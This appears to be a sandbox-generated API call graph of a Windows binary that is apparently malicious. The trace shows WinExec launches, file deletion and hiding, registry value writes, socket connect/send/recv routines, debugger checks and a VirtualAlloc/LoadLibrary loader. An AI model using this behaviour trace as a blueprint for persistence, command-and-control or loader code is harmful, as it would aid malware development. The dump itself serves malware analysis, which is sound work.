10010e59 72825->72826 72827 10002cb0 _invalid_parameter_noinfo_noreturn 72826->72827 72828 10010e68 72827->72828 72829 10002cb0 _invalid_parameter_noinfo_noreturn 72828->72829 72830 10010e77 72829->72830 72831 10002cb0 _invalid_parameter_noinfo_noreturn 72830->72831 72832 10010e86 72831->72832 72833 10002cb0 _invalid_parameter_noinfo_noreturn 72832->72833 72834 10010e95 72833->72834 72835 10005520 DeleteFileA 72834->72835 72836 10010ea7 72835->72836 72837 10002da0 8 API calls 72836->72837 72838 10010ec1 72837->72838 72839 10005300 31 API calls 72838->72839 72840 10010ed8 72839->72840 72841 10002cb0 _invalid_parameter_noinfo_noreturn 72840->72841 72842 10010eea Sleep 72841->72842 72843 10010f02 _Smanip _Error_objects 72842->72843 72844 10012640 9 API calls 72843->72844 72845 10011151 72844->72845 72846 10005400 9 API calls 72845->72846 72847 10011168 _Smanip _Error_objects 72846->72847 72848 10012640 9 API calls 72847->72848 72849 1001120e 72848->72849 72850 10005400 9 API calls 72849->72850 72851 10011225 72850->72851 72852 10013890 9 API calls 72851->72852 72853 10011264 72852->72853 72854 10002cb0 _invalid_parameter_noinfo_noreturn 72853->72854 72855 10011276 72854->72855 72856 10012620 _invalid_parameter_noinfo_noreturn 72855->72856 72857 10011285 72856->72857 72858 10002cb0 _invalid_parameter_noinfo_noreturn 72857->72858 72859 10011294 72858->72859 72860 10012620 _invalid_parameter_noinfo_noreturn 72859->72860 72861 100112a3 72860->72861 72862 100112b1 WinExec 72861->72862 72863 100112c4 _Smanip _Error_objects 72862->72863 72864 10012640 9 API calls 72863->72864 72865 100113fd 72864->72865 72866 10005400 9 API calls 72865->72866 72867 10011414 72866->72867 72868 10012620 _invalid_parameter_noinfo_noreturn 72867->72868 72869 10011426 _Smanip _Error_objects 72868->72869 72870 10012640 9 API calls 72869->72870 72871 100114b9 72870->72871 72872 10005400 9 API calls 72871->72872 72873 100114d0 72872->72873 73036 10003bc0 72873->73036 72875 10011503 73039 10003b90 
72875->73039 72877 10011542 72878 10002cd0 _invalid_parameter_noinfo_noreturn 72877->72878 72879 1001155d 72878->72879 72880 10002cb0 _invalid_parameter_noinfo_noreturn 72879->72880 72881 10011568 72880->72881 72882 10002cb0 _invalid_parameter_noinfo_noreturn 72881->72882 72883 10011577 72882->72883 72884 10002cb0 _invalid_parameter_noinfo_noreturn 72883->72884 72885 10011586 72884->72885 72886 10012620 _invalid_parameter_noinfo_noreturn 72885->72886 72887 10011595 72886->72887 72888 100115a3 WinExec Sleep 72887->72888 72889 100115c1 72888->72889 72890 10002da0 8 API calls 72889->72890 72891 100115cd 72890->72891 73042 10005740 72891->73042 72893 100115dd 72894 10002cb0 _invalid_parameter_noinfo_noreturn 72893->72894 72895 100115ef 72894->72895 72896 10002da0 8 API calls 72895->72896 72897 10011607 72896->72897 72898 10005740 SetFileAttributesA 72897->72898 72899 10011617 72898->72899 72900 10002cb0 _invalid_parameter_noinfo_noreturn 72899->72900 72901 10011629 72900->72901 72902 10005520 DeleteFileA 72901->72902 72903 1001163b 72902->72903 72904 10005520 DeleteFileA 72903->72904 72905 1001164f 72904->72905 72906 10002cb0 _invalid_parameter_noinfo_noreturn 72905->72906 72907 1001166b 72906->72907 72908 10002cb0 _invalid_parameter_noinfo_noreturn 72907->72908 72909 1001167a 72908->72909 72910 10002cb0 _invalid_parameter_noinfo_noreturn 72909->72910 72911 10011689 72910->72911 72912 10002cb0 _invalid_parameter_noinfo_noreturn 72911->72912 72913 10011698 72912->72913 72914 10002cb0 _invalid_parameter_noinfo_noreturn 72913->72914 72915 100116a7 72914->72915 72916 10002cb0 _invalid_parameter_noinfo_noreturn 72915->72916 72917 100116b6 72916->72917 72918 10002cb0 _invalid_parameter_noinfo_noreturn 72917->72918 72919 100116c5 72918->72919 72920 10002cb0 _invalid_parameter_noinfo_noreturn 72919->72920 72921 100116d4 72920->72921 72922 10002cb0 _invalid_parameter_noinfo_noreturn 72921->72922 72923 100116e3 72922->72923 72924 10002cb0 _invalid_parameter_noinfo_noreturn 
72923->72924 72925 100116f2 72924->72925 72926 10002cb0 _invalid_parameter_noinfo_noreturn 72925->72926 72927 10011701 72926->72927 72928 10002cb0 _invalid_parameter_noinfo_noreturn 72927->72928 72929 10011710 72928->72929 72930 10012620 _invalid_parameter_noinfo_noreturn 72929->72930 72931 1001171f 72930->72931 72932 10012620 _invalid_parameter_noinfo_noreturn 72931->72932 72933 1001172e 72932->72933 72934 10002cb0 _invalid_parameter_noinfo_noreturn 72933->72934 72935 1001173d 72934->72935 72936 10002cb0 _invalid_parameter_noinfo_noreturn 72935->72936 72937 1001174f 72936->72937 72939 10002da0 8 API calls 72938->72939 72940 10005588 72939->72940 72941 10002ad0 9 API calls 72940->72941 72942 100055b6 72941->72942 72943 10002ad0 9 API calls 72942->72943 72944 100055cf 72943->72944 73045 10012730 72944->73045 72947 10002ad0 9 API calls 72948 100055fa 72947->72948 72949 10002ad0 9 API calls 72948->72949 72954 10005613 _Error_objects 72949->72954 72950 1000567a 73049 10013910 72950->73049 72954->72950 73055 10012a40 10 API calls 72954->73055 73056 10012a20 9 API calls Concurrency::task_continuation_context::task_continuation_context 72954->73056 72955 10003bc0 10 API calls 72957 100056b5 72955->72957 72958 10002cb0 _invalid_parameter_noinfo_noreturn 72957->72958 72959 100056d0 72958->72959 72960 10002cb0 _invalid_parameter_noinfo_noreturn 72959->72960 72961 100056dc 72960->72961 72962 10002cb0 _invalid_parameter_noinfo_noreturn 72961->72962 72963 100056eb 72962->72963 72964 10002cb0 _invalid_parameter_noinfo_noreturn 72963->72964 72965 100056fa 72964->72965 72966 10002cb0 _invalid_parameter_noinfo_noreturn 72965->72966 72967 10005706 72966->72967 72968 10002cb0 _invalid_parameter_noinfo_noreturn 72967->72968 72969 10005715 72968->72969 72970 10002cb0 _invalid_parameter_noinfo_noreturn 72969->72970 72971 10005724 72970->72971 72971->72703 72973 1000500a 72972->72973 73075 100125c0 72973->73075 72976 10005028 72978 100050db _Error_objects 72976->72978 73091 10012600 9 
API calls 72976->73091 72977 100050c9 72977->72978 72979 100050f7 72977->72979 72980 1000512c 72977->72980 73081 100137c0 72978->73081 73092 10012600 9 API calls 72979->73092 73093 10012600 9 API calls 72980->73093 72984 1000515c 73094 10012600 9 API calls 72984->73094 72985 100051dd 73085 10004ee0 MultiByteToWideChar 72985->73085 72987 1000518a 72989 100051ef 72990 10002da0 8 API calls 72989->72990 72991 10005201 _MallocaArrayHolder 72990->72991 72992 10002cb0 _invalid_parameter_noinfo_noreturn 72991->72992 72993 1000522b 72992->72993 72994 10012620 _invalid_parameter_noinfo_noreturn 72993->72994 72995 1000523a 72994->72995 72996 10002cd0 72995->72996 72998 10002ce2 HandleT Concurrency::task_continuation_context::task_continuation_context 72996->72998 72997 10002cea 72997->72715 72998->72997 72999 10003230 _invalid_parameter_noinfo_noreturn 72998->72999 72999->72997 73001 10002e4c HandleT Concurrency::task_continuation_context::task_continuation_context 73000->73001 73099 10004020 73001->73099 73003 10002e9e 73004 10005250 73003->73004 73007 10005280 73004->73007 73006 100052c2 73009 10002cb0 _invalid_parameter_noinfo_noreturn 73006->73009 73007->73006 73113 10012780 73007->73113 73117 100129e0 11 API calls Concurrency::task_continuation_context::task_continuation_context 73007->73117 73010 100052e6 73009->73010 73010->72733 73118 100143c0 73011->73118 73013 100138e9 73013->72739 73015 10005531 73014->73015 73015->72745 73138 100124a0 73016->73138 73019 100053a7 73147 100053d0 73019->73147 73020 10005357 73023 1000536f ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 73020->73023 73022 100053b9 73022->72750 73142 10012400 73023->73142 73025 10005395 73026 1000539f SetFileAttributesA 73025->73026 73026->73019 73028 100139b5 HandleT Concurrency::task_continuation_context::task_continuation_context 73027->73028 73029 100139e5 73028->73029 73226 10001410 ?_Xlength_error@std@@YAXPBD 73028->73226 73031 100146c0 7 API calls 73029->73031 73032 10010bf3 
73031->73032 73033 10013a30 73032->73033 73034 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 73033->73034 73035 10013a48 73034->73035 73035->72792 73227 10002c50 73036->73227 73038 10003bd7 73038->72875 73239 10002c20 73039->73239 73041 10003ba7 73041->72877 73043 10002b60 73042->73043 73044 10005750 SetFileAttributesA 73043->73044 73044->72893 73046 10012742 Concurrency::task_continuation_context::task_continuation_context 73045->73046 73057 10013e30 73046->73057 73050 10013925 Concurrency::task_continuation_context::task_continuation_context 73049->73050 73052 10013948 73050->73052 73072 10001410 ?_Xlength_error@std@@YAXPBD 73050->73072 73064 100146c0 73052->73064 73054 10005691 73054->72955 73055->72954 73056->72954 73058 100055e2 73057->73058 73060 10013e3e 73057->73060 73058->72947 73060->73058 73062 100049b0 memchr 73060->73062 73063 100049e0 memcmp 73060->73063 73062->73060 73063->73060 73065 100146ec HandleT Concurrency::task_continuation_context::task_continuation_context 73064->73065 73070 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 73065->73070 73071 10014782 HandleT Concurrency::task_continuation_context::task_continuation_context 73065->73071 73067 100147ca 73074 100036d0 memcpy 73067->73074 73069 100147e1 _Error_objects Concurrency::task_continuation_context::task_continuation_context 73069->73054 73070->73071 73073 100036d0 memcpy 73071->73073 73072->73052 73073->73067 73074->73069 73076 100125cf 73075->73076 73077 100125e6 73076->73077 73080 100125f3 73076->73080 73095 10013090 ?_Xlength_error@std@@YAXPBD 73076->73095 73096 10013b70 8 API calls Concurrency::task_continuation_context::task_continuation_context 73077->73096 73080->72976 73083 100137f5 HandleT 73081->73083 73082 10013832 _Error_objects 73082->72985 73083->73082 73097 10014ab0 9 API calls 2 library calls 73083->73097 73098 10016360 73085->73098 73087 10004f1b memset MultiByteToWideChar 
WideCharToMultiByte 73088 10016360 73087->73088 73089 10004f7e memset WideCharToMultiByte 73088->73089 73090 10004fc2 _MallocaArrayHolder 73089->73090 73090->72989 73091->72977 73092->72978 73093->72984 73094->72987 73095->73077 73096->73080 73097->73082 73100 10004037 Concurrency::task_continuation_context::task_continuation_context 73099->73100 73102 10004041 Concurrency::task_continuation_context::task_continuation_context 73100->73102 73110 10001410 ?_Xlength_error@std@@YAXPBD 73100->73110 73103 1000406b 73102->73103 73105 1000409b Concurrency::task_continuation_context::task_continuation_context 73102->73105 73111 100036d0 memcpy 73103->73111 73106 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 73105->73106 73107 100040c2 HandleT Concurrency::task_continuation_context::task_continuation_context 73106->73107 73112 100036d0 memcpy 73107->73112 73109 1000408d _Error_objects 73109->73003 73110->73102 73111->73109 73112->73109 73114 1001279a Concurrency::task_continuation_context::task_continuation_context 73113->73114 73115 10013e30 2 API calls 73114->73115 73116 100127ca 73115->73116 73116->73007 73117->73007 73119 100143da Concurrency::task_continuation_context::task_continuation_context 73118->73119 73122 100148c0 73119->73122 73123 10003980 ?_Xout_of_range@std@@YAXPBD 73122->73123 73124 100148db 73123->73124 73125 100149bc 73124->73125 73128 1001490e Concurrency::task_continuation_context::task_continuation_context 73124->73128 73137 10014ff0 9 API calls 3 library calls 73125->73137 73127 100143f1 73127->73013 73134 100039e0 memcpy 73128->73134 73130 10014980 73135 100036d0 memcpy 73130->73135 73132 10014994 73136 100036d0 memcpy 73132->73136 73134->73130 73135->73132 73136->73127 73137->73127 73139 100124bb 73138->73139 73150 10012f80 73139->73150 73196 10012f10 73142->73196 73145 10012434 73145->73025 73146 10012418 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 73146->73145 73216 10012440 73147->73216 
73149 100053e2 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 73149->73022 73151 10012fd0 HandleT 73150->73151 73152 10012fab ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 73150->73152 73153 10012fe0 ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N 73151->73153 73152->73151 73160 10013680 ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE 73153->73160 73157 1001304f 73158 10013053 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 73157->73158 73159 10005333 ??Bios_base@std@ 73157->73159 73158->73159 73159->73019 73159->73020 73172 10012e40 73160->73172 73163 100135c0 73164 100135eb ?_Fiopen@std@@YAPAU_iobuf@@PBDHH 73163->73164 73171 100135e7 73163->73171 73165 1001360d 73164->73165 73164->73171 73166 10012e40 3 API calls 73165->73166 73167 1001361b ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 73166->73167 73178 10013a70 ??0_Lockit@std@@QAE@H ??Bid@locale@std@ 73167->73178 73169 10013642 73189 10012cd0 ?always_noconv@codecvt_base@std@ ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ HandleT 73169->73189 73171->73157 73173 10012e4f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 73172->73173 73175 10012e7f 73173->73175 73176 10012ede 73173->73176 73175->73176 73177 10012e88 _get_stream_buffer_pointers ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001 73175->73177 73176->73163 73177->73176 73190 10004cc0 73178->73190 73181 10013b47 ??1_Lockit@std@@QAE 73181->73169 73182 10013ad7 ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@ 73184 10013af5 73182->73184 73185 10013aed 73182->73185 73183 10013acf 73183->73181 73195 10015eef malloc ?_Xbad_alloc@std@ 73184->73195 73194 10004c10 _CxxThrowException std::bad_alloc::bad_alloc 73185->73194 73188 10013b14 73188->73181 73189->73171 73191 10004cd7 73190->73191 73192 10004d0c 73191->73192 73193 10004d11 ?_Getgloballocale@locale@std@@CAPAV_Locimp@12 73191->73193 73192->73181 73192->73182 
73192->73183 73193->73192 73194->73183 73195->73188 73197 10012f22 73196->73197 73205 10012f5a 73196->73205 73206 10012c90 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 73197->73206 73199 10012e40 3 API calls 73201 10012414 73199->73201 73201->73145 73201->73146 73205->73199 73207 10012cc9 73206->73207 73208 10012caa ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 73206->73208 73209 10012d20 73207->73209 73208->73207 73210 10012d32 Concurrency::task_continuation_context::task_continuation_context 73209->73210 73215 10012d3d fclose 73209->73215 73211 10012d8a ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 73210->73211 73210->73215 73212 10012dbf 73211->73212 73213 10012de1 fwrite 73212->73213 73212->73215 73214 10012e00 73213->73214 73213->73215 73214->73215 73215->73205 73219 10012390 73216->73219 73218 10012482 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 73218->73149 73220 100123c6 73219->73220 73221 100123be 73219->73221 73223 100123db ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE 73220->73223 73224 10012f10 8 API calls 73220->73224 73222 10012c90 2 API calls 73221->73222 73222->73220 73223->73218 73225 100123da 73224->73225 73225->73223 73226->73029 73228 10002c6a Concurrency::task_continuation_context::task_continuation_context 73227->73228 73231 100032f0 73228->73231 73230 10002c7d 73230->73038 73232 10003310 Concurrency::task_continuation_context::task_continuation_context 73231->73232 73233 1000335d 73231->73233 73237 100039e0 memcpy 73232->73237 73238 10004150 9 API calls 3 library calls 73233->73238 73236 1000333b Concurrency::task_continuation_context::task_continuation_context 73236->73230 73237->73236 73238->73236 73240 10002c30 HandleT 73239->73240 73241 100032f0 10 API calls 73240->73241 73242 10002c49 73241->73242 73242->73041 73243 42866f SetErrorMode 73244 272f0df 73251 2712c60 WSAStartup CreateEventW InterlockedExchange 73244->73251 73246 2716f17 77 API calls 73247 272f0e4 73246->73247 
73247->73246 73248 272f7db 73247->73248 73254 2715a20 CreateEventW 73248->73254 73282 2716815 73251->73282 73253 2712cff 73253->73247 73255 2715a79 73254->73255 73257 2715a83 73254->73257 73297 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73255->73297 73291 2716410 HeapCreate 73257->73291 73260 2715b12 73298 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73260->73298 73261 2715b1c CreateEventW 73263 2715b55 73261->73263 73264 2715b5f CreateEventW 73261->73264 73299 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73263->73299 73266 2715b84 CreateEventW 73264->73266 73267 2715b7a 73264->73267 73269 2715ba9 InitializeCriticalSectionAndSpinCount 73266->73269 73270 2715b9f 73266->73270 73300 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73267->73300 73272 2715c77 InitializeCriticalSectionAndSpinCount 73269->73272 73273 2715c6d 73269->73273 73301 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73270->73301 73275 2715c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 73272->73275 73276 2715c8e 73272->73276 73302 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73273->73302 73304 27167ff 73275->73304 73303 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73276->73303 73280 27167ff 77 API calls 73281 2715d3b 73280->73281 73283 271681d 73282->73283 73284 271681f IsDebuggerPresent 73282->73284 73283->73253 73290 271b5e6 73284->73290 73287 271794f SetUnhandledExceptionFilter UnhandledExceptionFilter 73288 2717974 GetCurrentProcess TerminateProcess 73287->73288 73289 271796c __call_reportfault 73287->73289 73288->73253 73289->73288 73290->73287 73292 2716441 73291->73292 73293 2716437 73291->73293 73295 2715af2 InitializeCriticalSectionAndSpinCount 73292->73295 73317 2716e49 66 API calls 2 library calls 73292->73317 73316 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73293->73316 73295->73260 73295->73261 
73297->73257 73298->73261 73299->73264 73300->73266 73301->73269 73302->73272 73303->73275 73306 2716f17 73304->73306 73305 2716e83 _malloc 66 API calls 73305->73306 73306->73305 73307 2715d2b 73306->73307 73310 2716f3d std::exception::exception 73306->73310 73318 2718550 DecodePointer 73306->73318 73307->73280 73314 2716f7b 73310->73314 73319 27173e9 76 API calls __cinit 73310->73319 73311 2716f85 73321 2717836 RaiseException 73311->73321 73320 2716e24 66 API calls std::exception::operator= 73314->73320 73315 2716f96 73316->73292 73317->73295 73318->73306 73319->73314 73320->73311 73321->73315 73322 272f63d send 73323 2713200 Sleep 73324 2713208 73323->73324 73325 27132e0 6 API calls 73326 2712d80 ResetEvent InterlockedExchange timeGetTime socket 73327 2712de8 73326->73327 73328 2712dfc lstrlenW WideCharToMultiByte 73326->73328 73329 2716815 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 73327->73329 73330 27167ff 77 API calls 73328->73330 73332 2712df6 73329->73332 73331 2712e22 lstrlenW WideCharToMultiByte gethostbyname 73330->73331 73333 2712e59 ctype 73331->73333 73334 2712e60 htons connect 73333->73334 73335 2712e96 73333->73335 73334->73335 73336 2712eab setsockopt setsockopt setsockopt setsockopt 73334->73336 73337 2716815 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 73335->73337 73339 2712f52 InterlockedExchange 73336->73339 73340 2712f24 WSAIoctl 73336->73340 73338 2712ea5 73337->73338 73347 271721b 73339->73347 73340->73339 73343 271721b 755 API calls 73344 2712f91 73343->73344 73345 2716815 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 73344->73345 73346 2712fa6 73345->73346 73348 271722b 73347->73348 73349 271723f 73347->73349 73395 271710d 66 API calls __getptd_noexit 73348->73395 73368 2719754 TlsGetValue 73349->73368 73353 2717230 73396 2718702 11 API calls ___strgtold12_l 73353->73396 73357 27172a2 73397 2716e49 66 API calls 2 library calls 73357->73397 73361 27172a8 73364 
2712f79 73361->73364 73398 2717133 66 API calls 3 library calls 73361->73398 73364->73343 73365 2717267 CreateThread 73365->73364 73367 271729a GetLastError 73365->73367 73456 27171b6 73365->73456 73367->73357 73369 2717245 73368->73369 73370 2719769 DecodePointer TlsSetValue 73368->73370 73371 2719fe4 73369->73371 73370->73369 73373 2719fed 73371->73373 73374 2717251 73373->73374 73375 271a00b Sleep 73373->73375 73399 271e555 73373->73399 73374->73357 73377 271990f 73374->73377 73376 271a020 73375->73376 73376->73373 73376->73374 73410 2719896 GetLastError 73377->73410 73379 2719917 73381 271725e 73379->73381 73424 2718315 66 API calls 3 library calls 73379->73424 73382 27197e2 73381->73382 73426 2719db0 73382->73426 73384 27197ee GetModuleHandleW 73427 271c144 73384->73427 73386 271982c InterlockedIncrement 73434 2719884 73386->73434 73389 271c144 __lock 64 API calls 73390 271984d 73389->73390 73437 271de7f InterlockedIncrement 73390->73437 73392 271986b 73449 271988d 73392->73449 73394 2719878 ___DllMainCRTStartup 73394->73365 73395->73353 73396->73364 73397->73361 73398->73364 73400 271e561 73399->73400 73406 271e57c 73399->73406 73401 271e56d 73400->73401 73400->73406 73408 271710d 66 API calls __getptd_noexit 73401->73408 73403 271e58f HeapAlloc 73405 271e5b6 73403->73405 73403->73406 73404 271e572 73404->73373 73405->73373 73406->73403 73406->73405 73409 2718550 DecodePointer 73406->73409 73408->73404 73409->73406 73411 2719754 ___set_flsgetvalue 3 API calls 73410->73411 73413 27198ad 73411->73413 73412 2719903 SetLastError 73412->73379 73413->73412 73414 2719fe4 __calloc_crt 62 API calls 73413->73414 73415 27198c1 73414->73415 73415->73412 73416 27198c9 DecodePointer 73415->73416 73417 27198de 73416->73417 73418 27198e2 73417->73418 73419 27198fa 73417->73419 73420 27197e2 __CRT_INIT@12 62 API calls 73418->73420 73425 2716e49 66 API calls 2 library calls 73419->73425 73422 27198ea GetCurrentThreadId 73420->73422 73422->73412 73423 2719900 73423->73412 
73425->73423 73426->73384 73428 271c159 73427->73428 73429 271c16c EnterCriticalSection 73427->73429 73452 271c082 66 API calls 9 library calls 73428->73452 73429->73386 73431 271c15f 73431->73429 73453 2718315 66 API calls 3 library calls 73431->73453 73454 271c06b LeaveCriticalSection 73434->73454 73436 2719846 73436->73389 73438 271dea0 73437->73438 73439 271de9d InterlockedIncrement 73437->73439 73440 271deaa InterlockedIncrement 73438->73440 73441 271dead 73438->73441 73439->73438 73440->73441 73442 271deb7 InterlockedIncrement 73441->73442 73443 271deba 73441->73443 73442->73443 73444 271dec4 InterlockedIncrement 73443->73444 73446 271dec7 73443->73446 73444->73446 73445 271dee0 InterlockedIncrement 73445->73446 73446->73445 73447 271def0 InterlockedIncrement 73446->73447 73448 271defb InterlockedIncrement 73446->73448 73447->73446 73448->73392 73455 271c06b LeaveCriticalSection 73449->73455 73451 2719894 73451->73394 73452->73431 73454->73436 73455->73451 73457 2719754 ___set_flsgetvalue 3 API calls 73456->73457 73458 27171c1 73457->73458 73471 2719734 TlsGetValue 73458->73471 73461 27171d0 73522 2719788 DecodePointer 73461->73522 73462 27171fa 73473 2719929 73462->73473 73464 2717215 73509 2717175 73464->73509 73467 27171df 73469 27171f0 GetCurrentThreadId 73467->73469 73470 27171e3 GetLastError ExitThread 73467->73470 73469->73464 73472 27171cc 73471->73472 73472->73461 73472->73462 73474 2719935 ___DllMainCRTStartup 73473->73474 73475 271994d 73474->73475 73476 2719a37 ___DllMainCRTStartup 73474->73476 73523 2716e49 66 API calls 2 library calls 73474->73523 73478 271995b 73475->73478 73524 2716e49 66 API calls 2 library calls 73475->73524 73476->73464 73479 2719969 73478->73479 73525 2716e49 66 API calls 2 library calls 73478->73525 73482 2719977 73479->73482 73526 2716e49 66 API calls 2 library calls 73479->73526 73484 2719985 73482->73484 73527 2716e49 66 API calls 2 library calls 73482->73527 73486 2719993 73484->73486 73528 2716e49 66 API calls 2 
library calls 73484->73528 73487 27199a1 73486->73487 73529 2716e49 66 API calls 2 library calls 73486->73529 73490 27199b2 73487->73490 73530 2716e49 66 API calls 2 library calls 73487->73530 73492 271c144 __lock 66 API calls 73490->73492 73493 27199ba 73492->73493 73494 27199df 73493->73494 73495 27199c6 InterlockedDecrement 73493->73495 73532 2719a43 LeaveCriticalSection _doexit 73494->73532 73495->73494 73497 27199d1 73495->73497 73497->73494 73531 2716e49 66 API calls 2 library calls 73497->73531 73498 27199ec 73499 271c144 __lock 66 API calls 73498->73499 73501 27199f3 73499->73501 73508 2719a24 73501->73508 73533 271df0e 8 API calls 73501->73533 73504 2719a31 73536 2716e49 66 API calls 2 library calls 73504->73536 73506 2719a08 73506->73508 73534 271dfa7 66 API calls 4 library calls 73506->73534 73535 2719a4f LeaveCriticalSection _doexit 73508->73535 73510 2717181 ___DllMainCRTStartup 73509->73510 73511 271990f __getptd 66 API calls 73510->73511 73512 2717186 73511->73512 73537 27152b0 73512->73537 73548 2712fb0 73512->73548 73558 27130c0 73512->73558 73563 27152d9 73512->73563 73513 2717190 73574 2717156 73513->73574 73515 2717196 73516 2719c41 __XcptFilter 66 API calls 73515->73516 73517 27171a7 73516->73517 73522->73467 73523->73475 73524->73478 73525->73479 73526->73482 73527->73484 73528->73486 73529->73487 73530->73490 73531->73494 73532->73498 73533->73506 73534->73508 73535->73504 73536->73476 73538 271536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 73537->73538 73544 27152cc 73537->73544 73539 27153ca 73538->73539 73540 271543c 73538->73540 73543 2715403 OpenProcess 73539->73543 73546 271542f Sleep 73539->73546 73585 2715820 105 API calls 2 library calls 73539->73585 73580 2ef0497 73540->73580 73543->73539 73545 2715415 GetExitCodeProcess 73543->73545 73544->73538 73545->73539 73546->73543 73549 27167ff 77 API calls 73548->73549 73550 2712fd3 73549->73550 73551 2713014 select 73550->73551 73552 271306d 73550->73552 73554 2713032 recv 
73550->73554 73557 271710d 66 API calls ___strgtold12_l 73550->73557 73759 2713350 73550->73759 73551->73550 73551->73552 73553 2716815 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 73552->73553 73555 2713098 73553->73555 73554->73550 73555->73513 73557->73550 73559 2713128 73558->73559 73561 27130d4 73558->73561 73559->73513 73560 27130e8 Sleep 73560->73561 73561->73559 73561->73560 73562 2713104 timeGetTime 73561->73562 73562->73561 73564 27152d2 73563->73564 73565 271536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 73564->73565 73566 27153ca 73565->73566 73567 271543c 73565->73567 73570 2715403 OpenProcess 73566->73570 73572 271542f Sleep 73566->73572 73841 2715820 105 API calls 2 library calls 73566->73841 73573 2ef0497 583 API calls 73567->73573 73569 2715442 73569->73513 73570->73566 73571 2715415 GetExitCodeProcess 73570->73571 73571->73566 73572->73570 73573->73569 73575 2719896 __getptd_noexit 66 API calls 73574->73575 73576 2717160 73575->73576 73577 271716b ExitThread 73576->73577 73842 2719a58 79 API calls __freefls@4 73576->73842 73579 271716a 73579->73577 73586 2ef00cd GetPEB 73580->73586 73583 2715442 73583->73513 73584 2ef04a8 73584->73583 73588 2ef01cb 73584->73588 73585->73539 73587 2ef00e5 73586->73587 73587->73584 73589 2ef01e6 73588->73589 73594 2ef01df 73588->73594 73590 2ef021e VirtualAlloc 73589->73590 73589->73594 73593 2ef0238 73590->73593 73590->73594 73591 2ef0330 LoadLibraryA 73591->73593 73591->73594 73592 2ef03a3 73592->73594 73596 30811f2 73592->73596 73593->73591 73593->73592 73594->73583 73597 30811fd 73596->73597 73598 3081202 73596->73598 73614 3088262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 73597->73614 73602 30810fc 73598->73602 73601 3081210 73601->73594 73604 3081108 ___BuildCatchObjectHelper 73602->73604 73603 3081155 73611 30811a5 ___BuildCatchObjectHelper 73603->73611 73667 307e480 73603->73667 73604->73603 73604->73611 73615 
3080f98 73604->73615 73608 3081185 73609 3080f98 __CRT_INIT@12 149 API calls 73608->73609 73608->73611 73609->73611 73610 307e480 ___DllMainCRTStartup 526 API calls 73612 308117c 73610->73612 73611->73601 73613 3080f98 __CRT_INIT@12 149 API calls 73612->73613 73613->73608 73614->73598 73616 3080fa4 ___BuildCatchObjectHelper 73615->73616 73617 3080fac 73616->73617 73618 3081026 73616->73618 73671 3081a1b HeapCreate 73617->73671 73620 308102c 73618->73620 73621 3081087 73618->73621 73627 308104a 73620->73627 73636 3080fb5 ___BuildCatchObjectHelper 73620->73636 73681 3081ce6 66 API calls _doexit 73620->73681 73622 308108c 73621->73622 73623 30810e5 73621->73623 73686 3083ca0 TlsGetValue 73622->73686 73623->73636 73714 3083fa6 79 API calls __freefls@4 73623->73714 73624 3080fb1 73626 3080fbc 73624->73626 73624->73636 73672 3084014 86 API calls 4 library calls 73626->73672 73632 308105e 73627->73632 73682 3087dfb 67 API calls _free 73627->73682 73685 3081071 70 API calls __mtterm 73632->73685 73635 3080fc1 __RTC_Initialize 73645 3080fd1 GetCommandLineA 73635->73645 73660 3080fc5 73635->73660 73636->73603 73638 3081054 73683 3083cf1 70 API calls _free 73638->73683 73641 30810a9 DecodePointer 73648 30810be 73641->73648 73643 3080fca 73643->73636 73644 3081059 73684 3081a39 HeapDestroy 73644->73684 73674 308817f 71 API calls 2 library calls 73645->73674 73649 30810d9 73648->73649 73650 30810c2 73648->73650 73708 307f639 73649->73708 73695 3083d2e 73650->73695 73651 3080fe1 73675 3087bb6 73 API calls __calloc_crt 73651->73675 73655 30810c9 GetCurrentThreadId 73655->73636 73656 3080feb 73657 3080fef 73656->73657 73677 30880c4 95 API calls 3 library calls 73656->73677 73676 3083cf1 70 API calls _free 73657->73676 73673 3081a39 HeapDestroy 73660->73673 73661 3080ffb 73662 308100f 73661->73662 73678 3087e4e 94 API calls 6 library calls 73661->73678 73662->73643 